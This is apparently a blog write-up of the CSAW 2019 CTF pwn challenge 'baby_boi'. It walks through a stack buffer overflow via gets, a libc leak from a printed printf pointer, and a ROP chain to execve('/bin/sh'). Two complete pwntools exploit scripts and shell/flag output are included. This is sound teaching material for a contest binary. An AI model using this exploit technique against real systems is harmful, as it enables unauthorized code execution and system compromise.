baby_boi (A Textbook CTF ROP Tutorial)

Welcome to pwn.

nc pwn.chal.csaw.io 1005

Ahhh, CSAW CTF. Amidst all the other CTFs where we’re competing with security professionals who probably have decades of experience and who follow security developments for a living or whatever, there remains a competition where scrubs like me can apply our extremely basic CTF skills and still feel kinda smart by earning points. Now that I’ve graduated and am no longer eligible, our team was pretty small and I didn’t dedicate the full weekend to the CTF, but it means I got to do the really easy challenges in the categories that I was the worst at, by which I mean pwn.

baby_boi is pretty much the simplest possible modern ROP (the modern security protections NX and ASLR are not artificially disabled, but you get everything you need to work around them). We even get source code.

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv[]) {
  char buf[32];
  printf("Hello!\n");
  printf("Here I am: %p\n", printf);
  gets(buf);
}

So there’s nothing novel here for experienced pwners, but I feel like there is a shortage of tutorials that walk you through how to solve a textbook ROP the way you’d want to solve it in a CTF, so here is a writeup.

As I said, pwns are really not the CTF category I contribute to, which is why this is only the second ROP I did in an actual contest. But since I wrote up my first ROP (PLC) with some conceptual detail and there are zillions of other ROP tutorials on the internet, I will assume understanding of how ROP works conceptually and just focus on the technical execution.

Setup

Here are all the tools we need:

A Linux machine. A VM is fine. You might want one even if your machine is already running Linux, so that you reduce the chances of CTF stuff messing with the rest of your machine.
Python, and the Python library pwntools, which is the library everybody and their mom use for interacting with binaries in CTFs. It’s extremely useful. As of time of writing it’s Python 2 only; there exists a Python 3 fork that is no longer maintained, but also works well enough. I wrote my script against the Python 3 fork, but the differences from Python 2 are small. (Hopefully we’ll have a supported Python 3 version before Python 2 stops being supported…) It also comes with a few very useful command-line utilities, particularly checksec.
The Python utility ROPgadget, which we will use for finding ROP gadgets.
(optional, but useful) The Ruby utility one_gadget.
Some other utilities that I think might come with Linux, but if not you should know what to Google: file, gdb, readelf, strings. In general I’d suggest setting up gdb with pwndbg and voltron, but I don’t think you need anything other than basic gdb functionality (if that) for this challenge.

Okay, let’s get ROPping.

Recon

The first thing to do is download the executable and libc. The second thing to do is probably run the basic diagnostic utilities against it, just to see what we’re up against. (checksec comes with pwntools.)

$ file baby_boi
baby_boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=065da8fff74608a5758babd74e18e7e046054d84, not stripped

$ checksec baby_boi
[*] '/home/akriloth/Dropbox/prog/ctf/csaw/2019/baby_boi'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

Nothing unusual. NX is on, so we can’t shellcode, but that’s what we’d expect anyway; the other protections are not strong, so we don’t need to worry about them.

Stack Smashing

gets lets us smash the stack as far as we want, but one thing we always need to know is how far down the stack the first return address we can smash is, so we know how much padding to add. You can be a diligent, disciplined hacker and count how much memory is allocated on the stack (32 bytes, for buf) and add the 8 bytes used to store the old ebp, but get the answer. You can also do it the dumb but foolproof way by opening gdb, running it against input like aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggg, observing which address the executable segfaults on, and looking for which ASCII character it comprises.

However you decide to find out, you should conclude that we have to pad 40 bytes before the return address.

Leaking libc

In more advanced challenges, to defeat ASLR, you have to first do a buffer overread or something else to leak an address in libc. Here, though, the libc leak is handed to us on a silver platter, in the form of a pointer to printf. A typical interaction will give something like:

$ nc pwn.chal.csaw.io 1005
Hello!
Here I am: 0x7f3c0a0b3e80

Let’s figure out its offset in libc, by grepping the output of readelf on the provided libc:

$ readelf -s libc-2.27.so | grep ' printf@'
   627: 0000000000064e80   195 FUNC    GLOBAL DEFAULT   13 printf@@GLIBC_2.2.5

So printf is at offset 0x64e80 in the server’s libc. (As confirmation that this is correct, you’ll note that the last three hex digits are the same as the address we got above, because ASLR only randomizes addresses with a granularity of 0x1000.) Therefore, we can calculate the runtime address of anything else in libc by taking the pointer we’re given, subtracting 0x64e80, and adding the fixed offset calculated from our copy of libc.

Note: You can also acquire this from directly inside your exploit script with pwntools, as well as let pwntools handle some offset calculations. This requires slightly more setup as you have to install more things to give pwntools the capability, and I’m not used to doing it, but it’s probably worth knowing.

libc = ELF('libc-2.27.so')
libc.symbols['printf']

Building the ROP Chain

Let’s use ROPgadget to look for gadgets. We’ll pick out the ones we want later. (This might take a few seconds or minutes, so we’d want to save the results into a text file and search it with our favorite text editor.)

$ ROPgadget --binary libc-2.27.so > gadgets.txt

Recall the bog-standard ROP payload, exactly the same I used in PLC: we want to call the syscall execve("/bin/sh", 0, 0), which gives us a shell, so we want to:

set rax to the syscall number of execve (on a 64-bit machine), which is 59 or 0x3b;
set rdi to a pointer to the string “/bin/sh”;
set rdx to 0;
set rsi to 0.

Our stack smash is powerful enough that we don’t have to worry about anything like avoiding null bytes in our chain, so the simplest, most reliably findable ROP gadgets we can to use to achieve our goal are just pop instructions for each of these registers. So, you can fire up favorite text editor and look in gadgets.txt for useful gadgets. For example, you can find the pop rax ; ret gadget (if one exists) with a regex search for : pop rax ; ret$. It does exist:

0x00000000000439c8 : pop rax ; ret

This gadget is at offset 0x439c8. For the full exploit, we decide that we want to set up the stack like this (top to bottom), where parentheses denote the location of the ROP gadget. This also happens to be the exact same setup as in PLC, conveniently. (We could just as well have used separate pop rdx ; ret and pop rsi ; ret gadgets, but given that we managed to find a gadget that does both, there’s no reason not to use it.)

(pop rax ; ret)
0x3b
(pop rdi ; ret)
(pointer to "/bin/sh")
(pop rdx ; pop rsi ; ret)
0
0
(syscall)

As above, all the locations of the gadgets are in gadgets.txt, so we just need to write down their offsets:

0x00000000000439c8 : pop rax ; ret
0x000000000002155f : pop rdi ; ret
0x00000000001306d9 : pop rdx ; pop rsi ; ret
0x00000000000d2975 : syscall ; ret

The one thing we still need to look up is the string /bin/sh. You can find it with the following command.

$ strings -tx libc-2.27.so | grep /bin/sh
 1b3e9a /bin/sh

(-t prints positions; with x as its argument, the positions are formatted in hexadecimal.)

Sidebar: `one_gadget`

When you have control of one return address, one_gadget is usually worth checking. It identifies single locations you can jump to that might give you a shell directly, with no further gadgets, if other constraints are also satisfied. It’s often faster to just try jumping to them and seeing if you get a shell, instead of manually seeing if the constraints are satisfied. In this case I don’t think they were. (Update: I could have sworn I tried all three one_gadget addresses during the contest and none of them worked, but they all work for me now, and judging by other writeups they worked for other people too.)

$ one_gadget libc-2.27.so
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

The Full Exploit

from pwn import *

# One of the many magic things pwntools does is that you can accept arguments
# from the environment or command line with zero setup, e.g. run this script as
#
#     $ python exploit.py REMOTE
#
# to run it against the remote server, or don't pass REMOTE to run it locally.

if args['REMOTE']:
    conn = remote('pwn.chal.csaw.io', 1005)
else:
    conn = process('baby_boi')

# conn.recvuntil("some string") is often more useful, but the input here
# doesn't have a super obvious terminator, so we read line by line.
conn.recvline()
ptr_line = conn.recvline()
ptr_text = re.search(r'0x([0-9a-z]+)', ptr_line.decode('utf-8')).group(1)
printf_ptr = int(ptr_text, 16)
libc_base = printf_ptr - 0x64e80

# The ROP chain, using these offsets as found above:
# 0x00000000000439c8 : pop rax ; ret
# 0x000000000002155f : pop rdi ; ret
# 0x00000000001306d9 : pop rdx ; pop rsi ; ret
# 0x1b3e9a /bin/sh
# 0x00000000000d2975 : syscall ; ret
exploit = b"a" * 40 # padding
exploit += p64(libc_base + 0x439c8) # `pop rax ; ret`
exploit += p64(59) # execve's syscall number, popped into rax
exploit += p64(libc_base + 0x2155f) # `pop rdi ; ret`
exploit += p64(libc_base + 0x1b3e9a) # "/bin/sh"
exploit += p64(libc_base + 0x1306d9) # `pop rdx ; pop rsi ; ret`
exploit += p64(0) # NULL, popped into rdx
exploit += p64(0) # NULL, popped into rsi
exploit += p64(libc_base + 0xd2975) # `syscall; ret`
exploit += b"\n"

# Send the exploit
conn.sendline(exploit)
# This should pop a shell, so now let us interact with the shell
conn.interactive()

And, the fun part:

$ python3 exploit.py REMOTE
[+] Opening connection to pwn.chal.csaw.io on port 1005: Done
[*] Switching to interactive mode
$ ls
baby_boi
flag.txt
$ cat flag.txt
flag{baby_boi_dodooo_doo_doo_dooo}

`one_gadget` version

The version I could have sworn I tried during the contest and didn’t work, but works for me now. Everything should look familiar except for 0x4f2c5, which was one of the gadgets one_gadget found for us. The other one_gadgets at 0x4f322 and 0x10a38c also work.

from pwn import *

if args['REMOTE']:
    conn = remote('pwn.chal.csaw.io', 1005)
else:
    conn = process('baby_boi')

conn.recvline()
ptr_line = conn.recvline()
ptr_text = re.search(r'0x([0-9a-z]+)', ptr_line.decode('utf-8')).group(1)
printf_ptr = int(ptr_text, 16)
libc_base = printf_ptr - 0x64e80
conn.sendline(b"a" * 40 + p64(libc_base + 0x4f2c5))
conn.interactive()

Bounded-Error Log

baby_boi (A Textbook CTF ROP Tutorial)

CSAW CTF Qualifiers 2019

Setup

Recon

Stack Smashing

Leaking libc

Building the ROP Chain

Sidebar: `one_gadget`

The Full Exploit

`one_gadget` version

Setup

Recon

Stack Smashing

Leaking libc

Building the ROP Chain

Sidebar: one_gadget

The Full Exploit

one_gadget version

Sidebar: `one_gadget`

`one_gadget` version